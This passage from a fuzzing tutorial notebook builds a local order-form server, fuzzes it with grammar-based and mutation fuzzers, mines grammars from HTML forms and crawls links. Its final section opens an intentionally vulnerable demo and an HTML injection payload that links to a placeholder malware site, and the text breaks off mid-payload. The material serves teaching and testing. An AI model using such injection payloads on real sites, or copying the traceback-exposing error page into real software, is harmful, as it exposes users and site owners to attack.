for any internal errors that might occur. For diagnostic purposes, we have it include the traceback of the failing function.", "_____no_output_____" ] ], [ [ "HTML_INTERNAL_SERVER_ERROR = \"\"\"\n<html><body>\n<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n <p>\n The server has encountered an internal error. Go to our <a href=\"/\">order form</a>.\n <pre>{error_message}</pre>\n </p>\n</div>\n</body></html>\n \"\"\"", "_____no_output_____" ], [ "HTML(HTML_INTERNAL_SERVER_ERROR)", "_____no_output_____" ], [ "import sys\nimport traceback", "_____no_output_____" ], [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def internal_server_error(self):\n self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, \"Internal Error\")\n\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n\n exc = traceback.format_exc()\n self.log_message(\"%s\", exc.strip())\n\n message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc)\n self.wfile.write(message.encode(\"utf8\"))", "_____no_output_____" ] ], [ [ "#### Logging\n\nOur server runs as a separate process in the background, waiting to receive commands at all time. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook.", "_____no_output_____" ], [ "For multiprocessing, we use the `multiprocess` module - a variant of the standard Python `multiprocessing` module that also works in notebooks. If you are running this code outside of a notebook, you can also use `multiprocessing` instead.", "_____no_output_____" ] ], [ [ "from multiprocess import Queue # type: ignore", "_____no_output_____" ], [ "HTTPD_MESSAGE_QUEUE = Queue()", "_____no_output_____" ] ], [ [ "Let us place two messages in the queue:", "_____no_output_____" ] ], [ [ "HTTPD_MESSAGE_QUEUE.put(\"I am another message\")", "_____no_output_____" ], [ "HTTPD_MESSAGE_QUEUE.put(\"I am one more message\")", "_____no_output_____" ] ], [ [ "To distinguish server messages from other parts of the notebook, we format them specially:", "_____no_output_____" ] ], [ [ "from bookutils import rich_output, terminal_escape", "_____no_output_____" ], [ "def display_httpd_message(message: str) -> None:\n if rich_output():\n display(\n HTML(\n '<pre style=\"background: NavajoWhite;\">' +\n message +\n \"</pre>\"))\n else:\n print(terminal_escape(message))", "_____no_output_____" ], [ "display_httpd_message(\"I am a httpd server message\")", "_____no_output_____" ] ], [ [ "The method `print_httpd_messages()` prints all messages accumulated in the queue so far:", "_____no_output_____" ] ], [ [ "def print_httpd_messages():\n while not HTTPD_MESSAGE_QUEUE.empty():\n message = HTTPD_MESSAGE_QUEUE.get()\n display_httpd_message(message)", "_____no_output_____" ], [ "import time", "_____no_output_____" ], [ "time.sleep(1)\nprint_httpd_messages()", "_____no_output_____" ] ], [ [ "With `clear_httpd_messages()`, we can silently discard all pending messages:", "_____no_output_____" ] ], [ [ "def clear_httpd_messages() -> None:\n while not HTTPD_MESSAGE_QUEUE.empty():\n HTTPD_MESSAGE_QUEUE.get()", "_____no_output_____" ] ], [ [ "The method `log_message()` in the request handler makes use of the queue to store its messages:", "_____no_output_____" ] ], [ [ "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n def log_message(self, format: str, *args) -> None:\n message = (\"%s - - [%s] %s\\n\" %\n (self.address_string(),\n self.log_date_time_string(),\n format % args))\n HTTPD_MESSAGE_QUEUE.put(message)", "_____no_output_____" ] ], [ [ "In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server:", "_____no_output_____" ] ], [ [ "import requests", "_____no_output_____" ], [ "def webbrowser(url: str, mute: bool = False) -> str:\n \"\"\"Download and return the http/https resource given by the URL\"\"\"\n\n try:\n r = requests.get(url)\n contents = r.text\n finally:\n if not mute:\n print_httpd_messages()\n else:\n clear_httpd_messages()\n\n return contents", "_____no_output_____" ] ], [ [ "With `webbrowser()`, we are now ready to get the Web server up and running. ", "_____no_output_____" ], [ "### End of Excursion", "_____no_output_____" ], [ "### Running the Server\n\nWe run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier.", "_____no_output_____" ] ], [ [ "def run_httpd_forever(handler_class: type) -> NoReturn: # type: ignore\n host = \"127.0.0.1\" # localhost IP\n for port in range(8800, 9000):\n httpd_address = (host, port)\n\n try:\n httpd = HTTPServer(httpd_address, handler_class)\n break\n except OSError:\n continue\n\n httpd_url = \"http://\" + host + \":\" + repr(port)\n HTTPD_MESSAGE_QUEUE.put(httpd_url)\n httpd.serve_forever()", "_____no_output_____" ] ], [ [ "The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocess` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server.", "_____no_output_____" ] ], [ [ "from multiprocess import Process", "_____no_output_____" ], [ "def start_httpd(handler_class: type = SimpleHTTPRequestHandler) \\\n -> Tuple[Process, str]:\n clear_httpd_messages()\n\n httpd_process = Process(target=run_httpd_forever, args=(handler_class,))\n httpd_process.start()\n\n httpd_url = HTTPD_MESSAGE_QUEUE.get()\n return httpd_process, httpd_url", "_____no_output_____" ] ], [ [ "Let us now start the server and save its URL:", "_____no_output_____" ] ], [ [ "httpd_process, httpd_url = start_httpd()\nhttpd_url", "_____no_output_____" ] ], [ [ "### Interacting with the Server\n\nLet us now access the server just created.", "_____no_output_____" ], [ "#### Direct Browser Access\n\nIf you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below.\n\n**Note**: This only works if you are running the Jupyter notebook server on the local host.", "_____no_output_____" ] ], [ [ "def print_url(url: str) -> None:\n if rich_output():\n display(HTML('<pre><a href=\"%s\">%s</a></pre>' % (url, url)))\n else:\n print(terminal_escape(url))", "_____no_output_____" ], [ "print_url(httpd_url)", "_____no_output_____" ] ], [ [ "Even more convenient, you may be able to interact directly with the server using the window below. \n\n**Note**: This only works if you are running the Jupyter notebook server on the local host.", "_____no_output_____" ] ], [ [ "from IPython.display import IFrame", "_____no_output_____" ], [ "IFrame(httpd_url, '100%', 230)", "_____no_output_____" ] ], [ [ "After interaction, you can retrieve the messages produced by the server:", "_____no_output_____" ] ], [ [ "print_httpd_messages()", "_____no_output_____" ] ], [ [ "We can also see any orders placed in the `orders` database (`db`):", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[]\n" ] ], [ [ "And we can clear the order database:", "_____no_output_____" ] ], [ [ "db.execute(\"DELETE FROM orders\")\ndb.commit()", "_____no_output_____" ] ], [ [ "#### Retrieving the Home Page\n\nEven if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them:", "_____no_output_____" ] ], [ [ "contents = webbrowser(httpd_url)", "_____no_output_____" ], [ "HTML(contents)", "_____no_output_____" ] ], [ [ "#### Placing Orders\n\nTo test this form, we can generate URLs with orders and have the server process them.", "_____no_output_____" ], [ "The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order.", "_____no_output_____" ] ], [ [ "from urllib.parse import urljoin, urlsplit", "_____no_output_____" ], [ "urljoin(httpd_url, \"/order?foo=bar\")", "_____no_output_____" ] ], [ [ "With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. Sending this URL to the browser effectively places the order, as we can see in the server log produced:", "_____no_output_____" ] ], [ [ "contents = webbrowser(urljoin(httpd_url,\n \"/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104\"))", "_____no_output_____" ] ], [ [ "The web page returned confirms the order:", "_____no_output_____" ] ], [ [ "HTML(contents)", "_____no_output_____" ] ], [ [ "And the order is in the database, too:", "_____no_output_____" ] ], [ [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104')]\n" ] ], [ [ "#### Error Messages\n\nWe can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, \"/some/other/path\")))", "_____no_output_____" ] ], [ [ "You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter.", "_____no_output_____" ], [ "## Fuzzing Input Forms\n\nAfter setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values.", "_____no_output_____" ], [ "### Fuzzing with Expected Values\n\nSince placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. It comes with a few sample values for names, email addresses, cities and (random) digits.", "_____no_output_____" ], [ "#### Excursion: Implementing cgi_decode()", "_____no_output_____" ], [ "To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and autmatically encoding it into CGI:", "_____no_output_____" ] ], [ [ "import string", "_____no_output_____" ], [ "def cgi_encode(s: str, do_not_encode: str = \"\") -> str:\n ret = \"\"\n for c in s:\n if (c in string.ascii_letters or c in string.digits\n or c in \"$-_.+!*'(),\" or c in do_not_encode):\n ret += c\n elif c == ' ':\n ret += '+'\n else:\n ret += \"%%%02x\" % ord(c)\n return ret", "_____no_output_____" ], [ "s = cgi_encode('Is \"DOW30\" down .24%?')\ns", "_____no_output_____" ] ], [ [ "The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules:", "_____no_output_____" ] ], [ [ "cgi_encode(\"<string>@<string>\", \"<>\")", "_____no_output_____" ] ], [ [ "`cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb):", "_____no_output_____" ] ], [ [ "from Coverage import cgi_decode # minor dependency", "_____no_output_____" ], [ "cgi_decode(s)", "_____no_output_____" ] ], [ [ "#### End of Excursion", "_____no_output_____" ], [ "In the grammar, we make use of `cgi_encode()` to encode strings:", "_____no_output_____" ] ], [ [ "from Grammars import crange, is_valid_grammar, syntax_diagram, Grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR: Grammar = {\n \"<start>\": [\"<order>\"],\n \"<order>\": [\"/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>\"],\n \"<item>\": [\"tshirt\", \"drill\", \"lockset\"],\n \"<name>\": [cgi_encode(\"Jane Doe\"), cgi_encode(\"John Smith\")],\n \"<email>\": [cgi_encode(\"[email protected]\"), cgi_encode(\"[email protected]\")],\n \"<city>\": [\"Seattle\", cgi_encode(\"New York\")],\n \"<zip>\": [\"<digit>\" * 5],\n \"<digit>\": crange('0', '9')\n}", "_____no_output_____" ], [ "assert is_valid_grammar(ORDER_GRAMMAR)", "_____no_output_____" ], [ "syntax_diagram(ORDER_GRAMMAR)", "start\n" ] ], [ [ "Using [one of our grammar fuzzers](GrammarFuzzer.iynb), we can instantiate this grammar and generate URLs:", "_____no_output_____" ] ], [ [ "from GrammarFuzzer import GrammarFuzzer", "_____no_output_____" ], [ "order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR)\n[order_fuzzer.fuzz() for i in range(5)]", "_____no_output_____" ] ], [ [ "Sending these URLs to the server will have them processed correctly:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))", "_____no_output_____" ], [ "print(db.execute(\"SELECT * FROM orders\").fetchall())", "[('tshirt', 'Jane Doe', '[email protected]', 'Seattle', '98104'), ('lockset', 'Jane Doe', '[email protected]', 'Seattle', '16631')]\n" ] ], [ [ "### Fuzzing with Unexpected Values", "_____no_output_____" ], [ "We can now see that the server does a good job when faced with \"standard\" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. the value to be mutated) comes from the grammar fuzzer:", "_____no_output_____" ] ], [ [ "seed = order_fuzzer.fuzz()\nseed", "_____no_output_____" ] ], [ [ "Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure.", "_____no_output_____" ] ], [ [ "from MutationFuzzer import MutationFuzzer # minor deoendency", "_____no_output_____" ], [ "mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1)\n[mutate_order_fuzzer.fuzz() for i in range(5)]", "_____no_output_____" ] ], [ [ "Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code.", "_____no_output_____" ] ], [ [ "while True:\n path = mutate_order_fuzzer.fuzz()\n url = urljoin(httpd_url, path)\n r = requests.get(url)\n if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n break", "_____no_output_____" ] ], [ [ "That didn't take long. Here's the offending URL:", "_____no_output_____" ] ], [ [ "url", "_____no_output_____" ], [ "clear_httpd_messages()\nHTML(webbrowser(url))", "_____no_output_____" ] ], [ [ "How does the URL cause this internal error? We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition:", "_____no_output_____" ] ], [ [ "failing_path = path\nfailing_path", "_____no_output_____" ], [ "from Fuzzer import Runner", "_____no_output_____" ], [ "class WebRunner(Runner):\n \"\"\"Runner for a Web server\"\"\"\n\n def __init__(self, base_url: str = None):\n self.base_url = base_url\n\n def run(self, url: str) -> Tuple[str, str]:\n if self.base_url is not None:\n url = urljoin(self.base_url, url)\n\n import requests # for imports\n r = requests.get(url)\n if r.status_code == HTTPStatus.OK:\n return url, Runner.PASS\n elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR:\n return url, Runner.FAIL\n else:\n return url, Runner.UNRESOLVED", "_____no_output_____" ], [ "web_runner = WebRunner(httpd_url)\nweb_runner.run(failing_path)", "_____no_output_____" ] ], [ [ "This is the minimized path:", "_____no_output_____" ] ], [ [ "from Reducer import DeltaDebuggingReducer # minor", "_____no_output_____" ], [ "minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path)\nminimized_path", "_____no_output_____" ] ], [ [ "It turns out that our server encounters an internal error if we do not supply the requested fields:", "_____no_output_____" ] ], [ [ "minimized_url = urljoin(httpd_url, minimized_path)\nminimized_url", "_____no_output_____" ], [ "clear_httpd_messages()\nHTML(webbrowser(minimized_url))", "_____no_output_____" ] ], [ [ "We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do.", "_____no_output_____" ], [ "## Extracting Grammars for Input Forms\n\nIn our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step.", "_____no_output_____" ], [ "### Searching HTML for Input Fields\n\nThe key idea of our approach is to identify all input fields in a form. To this end, let us take a look at how the individual elements in our order form are encoded in HTML:", "_____no_output_____" ] ], [ [ "html_text = webbrowser(httpd_url)\nprint(html_text[html_text.find(\"<form\"):html_text.find(\"</form>\") + len(\"</form>\")])", "_____no_output_____" ] ], [ [ "We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form.", "_____no_output_____" ], [ "To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library.", "_____no_output_____" ] ], [ [ "from html.parser import HTMLParser", "_____no_output_____" ] ], [ [ "During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`\"text\"`, `\"number\"`, `\"checkbox\"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection.", "_____no_output_____" ] ], [ [ "class FormHTMLParser(HTMLParser):\n \"\"\"A parser for HTML forms\"\"\"\n\n def reset(self) -> None:\n super().reset()\n\n # Form action attribute (a URL)\n self.action = \"\"\n\n # Map of field name to type\n # (or selection name to [option_1, option_2, ...])\n self.fields: Dict[str, List[str]] = {}\n\n # Stack of currently active selection names\n self.select: List[str] = [] ", "_____no_output_____" ] ], [ [ "While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). `attributes` gives us a map of associated attributes and values.\n\nHere is how we process the individual tags:\n* When we find a `<form>` tag, we save the associated action in the `action` attribute;\n* When we find an `<input>` tag or similar, we save the type in the `fields` attribute;\n* When we find a `<select>` tag or similar, we push its name on the `select` stack;\n* When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag.", "_____no_output_____" ] ], [ [ "class FormHTMLParser(FormHTMLParser):\n def handle_starttag(self, tag, attrs):\n attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n # print(tag, attributes)\n\n if tag == \"form\":\n self.action = attributes.get(\"action\", \"\")\n\n elif tag == \"select\" or tag == \"datalist\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = []\n self.select.append(name)\n else:\n self.select.append(None)\n\n elif tag == \"option\" and \"multiple\" not in attributes:\n current_select_name = self.select[-1]\n if current_select_name is not None and \"value\" in attributes:\n self.fields[current_select_name].append(attributes[\"value\"])\n\n elif tag == \"input\" or tag == \"option\" or tag == \"textarea\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = attributes.get(\"type\", \"text\")\n\n elif tag == \"button\":\n if \"name\" in attributes:\n name = attributes[\"name\"]\n self.fields[name] = [\"\"]", "_____no_output_____" ], [ "class FormHTMLParser(FormHTMLParser):\n def handle_endtag(self, tag):\n if tag == \"select\":\n self.select.pop()", "_____no_output_____" ] ], [ [ "Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types.", "_____no_output_____" ], [ "Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes a HTML document to parse. It then returns the associated action and the associated fields:", "_____no_output_____" ] ], [ [ "class HTMLGrammarMiner:\n \"\"\"Mine a grammar from a HTML form\"\"\"\n\n def __init__(self, html_text: str) -> None:\n \"\"\"Constructor. `html_text` is the HTML string to parse.\"\"\"\n\n html_parser = FormHTMLParser()\n html_parser.feed(html_text)\n self.fields = html_parser.fields\n self.action = html_parser.action", "_____no_output_____" ] ], [ [ "Applied on our order form, this is what we get:", "_____no_output_____" ] ], [ [ "html_miner = HTMLGrammarMiner(html_text)\nhtml_miner.action", "_____no_output_____" ], [ "html_miner.fields", "_____no_output_____" ] ], [ [ "From this structure, we can now generate a grammar that automatically produces valid form submission URLs.", "_____no_output_____" ], [ "### Mining Grammars for Web Pages", "_____no_output_____" ], [ "To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. Our default grammar provides very simple rules for these types.", "_____no_output_____" ] ], [ [ "from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar", "_____no_output_____" ], [ "class HTMLGrammarMiner(HTMLGrammarMiner):\n QUERY_GRAMMAR: Grammar = extend_grammar(CGI_GRAMMAR, {\n \"<start>\": [\"<action>?<query>\"],\n\n \"<text>\": [\"<string>\"],\n\n \"<number>\": [\"<digits>\"],\n \"<digits>\": [\"<digit>\", \"<digits><digit>\"],\n \"<digit>\": crange('0', '9'),\n\n \"<checkbox>\": [\"<_checkbox>\"],\n \"<_checkbox>\": [\"on\", \"off\"],\n\n \"<email>\": [\"<_email>\"],\n \"<_email>\": [cgi_encode(\"<string>@<string>\", \"<>\")],\n\n # Use a fixed password in case we need to repeat it\n \"<password>\": [\"<_password>\"],\n \"<_password>\": [\"abcABC.123\"],\n\n # Stick to printable characters to avoid logging problems\n \"<percent>\": [\"%<hexdigit-1><hexdigit>\"],\n \"<hexdigit-1>\": srange(\"34567\"),\n\n # Submissions:\n \"<submit>\": [\"\"]\n })", "_____no_output_____" ] ], [ [ "Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type.", "_____no_output_____" ] ], [ [ "class HTMLGrammarMiner(HTMLGrammarMiner):\n def mine_grammar(self) -> Grammar:\n \"\"\"Extract a grammar from the given HTML text\"\"\"\n\n grammar: Grammar = extend_grammar(self.QUERY_GRAMMAR)\n grammar[\"<action>\"] = [self.action]\n\n query = \"\"\n for field in self.fields:\n field_symbol = new_symbol(grammar, \"<\" + field + \">\")\n field_type = self.fields[field]\n\n if query != \"\":\n query += \"&\"\n query += field_symbol\n\n if isinstance(field_type, str):\n field_type_symbol = \"<\" + field_type + \">\"\n grammar[field_symbol] = [field + \"=\" + field_type_symbol]\n if field_type_symbol not in grammar:\n # Unknown type\n grammar[field_type_symbol] = [\"<text>\"]\n else:\n # List of values\n value_symbol = new_symbol(grammar, \"<\" + field + \"-value>\")\n grammar[field_symbol] = [field + \"=\" + value_symbol]\n grammar[value_symbol] = field_type # type: ignore\n\n grammar[\"<query>\"] = [query]\n\n # Remove unused parts\n for nonterminal in unreachable_nonterminals(grammar):\n del grammar[nonterminal]\n\n assert is_valid_grammar(grammar)\n\n return grammar", "_____no_output_____" ] ], [ [ "Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar:", "_____no_output_____" ] ], [ [ "html_miner = HTMLGrammarMiner(html_text)\ngrammar = html_miner.mine_grammar()\ngrammar", "_____no_output_____" ] ], [ [ "Let us take a look into the structure of the grammar. It produces URL paths of this form:", "_____no_output_____" ] ], [ [ "grammar[\"<start>\"]", "_____no_output_____" ] ], [ [ "Here, the `<action>` comes from the `action` attribute of the HTML form:", "_____no_output_____" ] ], [ [ "grammar[\"<action>\"]", "_____no_output_____" ] ], [ [ "The `<query>` is composed from the individual field items:", "_____no_output_____" ] ], [ [ "grammar[\"<query>\"]", "_____no_output_____" ] ], [ [ "Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar:", "_____no_output_____" ] ], [ [ "grammar[\"<zip>\"]", "_____no_output_____" ], [ "grammar[\"<terms>\"]", "_____no_output_____" ] ], [ [ "These are the query URLs produced from the grammar. We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random:", "_____no_output_____" ] ], [ [ "order_fuzzer = GrammarFuzzer(grammar)\n[order_fuzzer.fuzz() for i in range(3)]", "_____no_output_____" ] ], [ [ "We can again feed these directly into our Web browser:", "_____no_output_____" ] ], [ [ "HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz())))", "_____no_output_____" ] ], [ [ "We see (one more time) that we can mine a grammar automatically from given data.", "_____no_output_____" ], [ "### A Fuzzer for Web Forms\n\nTo make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it.", "_____no_output_____" ] ], [ [ "class WebFormFuzzer(GrammarFuzzer):\n \"\"\"A Fuzzer for Web forms\"\"\"\n\n def __init__(self, url: str, *,\n grammar_miner_class: Optional[type] = None,\n **grammar_fuzzer_options):\n \"\"\"Constructor.\n `url` - the URL of the Web form to fuzz.\n `grammar_miner_class` - the class of the grammar miner\n to use (default: `HTMLGrammarMiner`)\n Other keyword arguments are passed to the `GrammarFuzzer` constructor\n \"\"\"\n\n if grammar_miner_class is None:\n grammar_miner_class = HTMLGrammarMiner\n self.grammar_miner_class = grammar_miner_class\n\n # We first extract the HTML form and its grammar...\n html_text = self.get_html(url)\n grammar = self.get_grammar(html_text)\n\n # ... and then initialize the `GrammarFuzzer` superclass with it\n super().__init__(grammar, **grammar_fuzzer_options)\n\n def get_html(self, url: str):\n \"\"\"Retrieve the HTML text for the given URL `url`.\n To be overloaded in subclasses.\"\"\"\n return requests.get(url).text\n\n def get_grammar(self, html_text: str):\n \"\"\"Obtain the grammar for the given HTML `html_text`.\n To be overloaded in subclasses.\"\"\"\n grammar_miner = self.grammar_miner_class(html_text)\n return grammar_miner.mine_grammar()", "_____no_output_____" ] ], [ [ "All it now takes to fuzz a Web form is to provide its URL:", "_____no_output_____" ] ], [ [ "web_form_fuzzer = WebFormFuzzer(httpd_url)\nweb_form_fuzzer.fuzz()", "_____no_output_____" ] ], [ [ "We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server:", "_____no_output_____" ] ], [ [ "web_form_runner = WebRunner(httpd_url)\nweb_form_fuzzer.runs(web_form_runner, 10)", "_____no_output_____" ] ], [ [ "While convenient to use, this fuzzer is still very rudimentary:\n\n* It is limited to one form per page.\n* It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions.\n* The fuzzer is build on HTML only. There is no Javascript handling for dynamic Web pages.", "_____no_output_____" ], [ "Let us clear any pending messages before we get to the next section:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ] ], [ [ "## Crawling User Interfaces", "_____no_output_____" ], [ "So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page.", "_____no_output_____" ], [ "Our crawler is pretty straightforward. Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form\n\n```html\n<a href=\"<link>\">\n```\n\nand saves all the links found in a list called `links`.", "_____no_output_____" ] ], [ [ "class LinkHTMLParser(HTMLParser):\n \"\"\"Parse all links found in a HTML page\"\"\"\n\n def reset(self):\n super().reset()\n self.links = []\n\n def handle_starttag(self, tag, attrs):\n attributes = {attr_name: attr_value for attr_name, attr_value in attrs}\n\n if tag == \"a\" and \"href\" in attributes:\n # print(\"Found:\", tag, attributes)\n self.links.append(attributes[\"href\"])", "_____no_output_____" ] ], [ [ "The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan.", "_____no_output_____" ], [ "### Excursion: Implementing a Crawler", "_____no_output_____" ] ], [ [ "from collections import deque\nimport urllib.robotparser", "_____no_output_____" ], [ "def crawl(url, max_pages: Union[int, float] = 1, same_host: bool = True):\n \"\"\"Return the list of linked URLs from the given URL.\n `max_pages` - the maximum number of pages accessed.\n `same_host` - if True (default), stay on the same host\"\"\"\n\n pages = deque([(url, \"<param>\")])\n urls_seen = set()\n\n rp = urllib.robotparser.RobotFileParser()\n rp.set_url(urljoin(url, \"/robots.txt\"))\n rp.read()\n\n while len(pages) > 0 and max_pages > 0:\n page, referrer = pages.popleft()\n if not rp.can_fetch(\"*\", page):\n # Disallowed by robots.txt\n continue\n\n r = requests.get(page)\n max_pages -= 1\n\n if r.status_code != HTTPStatus.OK:\n print(\"Error \" + repr(r.status_code) + \": \" + page,\n \"(referenced from \" + referrer + \")\",\n file=sys.stderr)\n continue\n\n content_type = r.headers[\"content-type\"]\n if not content_type.startswith(\"text/html\"):\n continue\n\n parser = LinkHTMLParser()\n parser.feed(r.text)\n\n for link in parser.links:\n target_url = urljoin(page, link)\n if same_host and urlsplit(\n target_url).hostname != urlsplit(url).hostname:\n # Different host\n continue\n\n if urlsplit(target_url).fragment != \"\":\n # Ignore #fragments\n continue\n\n if target_url not in urls_seen:\n pages.append((target_url, page))\n urls_seen.add(target_url)\n yield target_url\n\n if page not in urls_seen:\n urls_seen.add(page)\n yield page", "_____no_output_____" ] ], [ [ "### End of Excursion", "_____no_output_____" ], [ "We can run the crawler on our own server, where it will quickly return the order page and the terms and conditions page.", "_____no_output_____" ] ], [ [ "for url in crawl(httpd_url):\n print_httpd_messages()\n print_url(url)", "_____no_output_____" ] ], [ [ "We can also crawl over other sites, such as the home page of this project.", "_____no_output_____" ] ], [ [ "for url in crawl(\"https://www.fuzzingbook.org/\"):\n print_url(url)", "_____no_output_____" ] ], [ [ "Once we have crawled over all the links of a site, we can generate tests for all the forms we found:", "_____no_output_____" ] ], [ [ "for url in crawl(httpd_url, max_pages=float('inf')):\n web_form_fuzzer = WebFormFuzzer(url)\n web_form_runner = WebRunner(url)\n print(web_form_fuzzer.run(web_form_runner))", "('http://127.0.0.1:8800/terms', 'PASS')\n('http://127.0.0.1:8800/order?item=tshirt&name=+&email=b+%742%40+&city=%45%39&zip=54&terms=on&submit=', 'PASS')\n('http://127.0.0.1:8800/order?item=drill&name=%52-&email=e%40%3f&city=+&zip=5&terms=on&submit=', 'PASS')\n" ] ], [ [ "For even better effects, one could integrate crawling and fuzzing – and also analyze the order confirmation pages for further links. We leave this to the reader as an exercise.", "_____no_output_____" ], [ "Let us get rid of any server messages accumulated above:", "_____no_output_____" ] ], [ [ "clear_httpd_messages()", "_____no_output_____" ] ], [ [ "## Crafting Web Attacks\n\nBefore we close the chapter, let us take a look at a special class of \"uncommon\" inputs that not only yield generic failures, but actually allow _attackers_ to manipulate the server at their will. We will illustrate three common attacks using our server, which (surprise) actually turns out to be vulnerable against all of them.", "_____no_output_____" ], [ "### HTML Injection Attacks\n\nThe first kind of attack we look at is *HTML injection*. The idea of HTML injection is to supply the Web server with _data that can also be interpreted as HTML_. If this HTML data is then displayed to users in their Web browsers, it can serve malicious purposes, although (seemingly) originating from a reputable site. If this data is also _stored_, it becomes a _persistent_ attack; the attacker does not even have to lure victims towards specific pages.", "_____no_output_____" ], [ "Here is an example of a (simple) HTML injection. For the `name` field, we not only use plain text, but also embed HTML tags – in this case, a link towards a malware-hosting site.", "_____no_output_____" ] ], [ [ "from Grammars import extend_grammar", "_____no_output_____" ], [ "ORDER_GRAMMAR_WITH_HTML_INJECTION: Grammar = extend_grammar(ORDER_GRAMMAR, {\n \"<name>\": [cgi_encode('''\n Jane Doe<p>\n <strong><a href=\"www.lots.of.malware\">Click here for 